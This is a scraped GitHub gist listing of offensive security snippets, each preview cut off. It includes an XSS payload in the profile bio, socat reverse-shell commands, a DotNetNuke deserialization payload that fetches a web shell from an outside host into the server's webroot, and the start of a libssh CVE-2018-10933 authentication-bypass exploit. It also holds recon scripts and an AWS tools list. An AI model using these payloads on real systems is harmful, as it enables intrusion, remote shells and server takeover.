Skip to content

Instantly share code, notes, and snippets.

View pnigos's full-sized avatar
:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=

pnig0s pnigos

:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=
View GitHub Profile
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt
@markofu
markofu / Security_Tools_for_AWS.MD
Last active October 2, 2023 15:30
Security Tools for AWS

Security Tools for AWS

I often get asked which tools are good to use for securing your AWS infrastructure so I figured I'd write a short listof some useful Security Tools for the AWS Cloud Infrastructure.

This list is not intended be something completely exhaustive, more so provide a good launching pad for someone as they dig into AWS and want to make it secure from the start.

Open Source

This section focuses on tools and services provided by the community and released as open-source.

@fransr
fransr / bucket-disclose.sh
Last active February 16, 2025 14:38
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@topolik
topolik / json-deserialization-ldap.sh
Created August 17, 2018 20:49
Backend script based on @pwntester JSON deserialization research
#!/bin/bash
echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds
echo "... waiting 20 seconds to start Apache DS"
sleep 20
# password: secret, if used with LDAP login
(cat <<"EOF"
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us
@hub2
hub2 / exploit.py
Created January 4, 2019 18:57
Flaglab Real World CTF
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import random
import logging
import time